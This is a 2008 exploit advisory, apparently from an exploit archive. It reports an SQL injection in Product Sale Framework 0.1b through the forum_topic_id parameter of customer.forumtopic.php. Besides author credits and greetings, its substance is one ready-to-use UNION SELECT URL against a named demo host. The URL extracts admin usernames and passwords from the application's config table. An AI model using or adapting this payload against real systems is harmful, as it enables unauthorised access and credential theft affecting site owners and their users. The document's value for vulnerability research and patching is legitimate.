[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Product Sale Framework 0.1b (forum_topic_id) SQL Injection Vulnerability
# Published : 2008-12-07
# Author : b3hz4d
# Previous Title : PayPal eStore Admin Password Changing Exploit
# Next Title : w3blabor CMS 3.0.5 Arbitrary File Upload & LFI Exploit


+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
        +                                                                    +
        +         Product Sale Framework sql injection Vulnerability         +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 06 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR        : http://www.productsaleframework.com
DEMO (links)  : http://www.productsaleframework.com

#####################################################


[+] vuln    : 
              customer.forumtopic.php
              
              vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:
             
              http://www.productsaleframework.com/

[+] Exploit : 
              Admin Username and Password:

              http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
    
               
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# www.Syue.com [2008-12-07]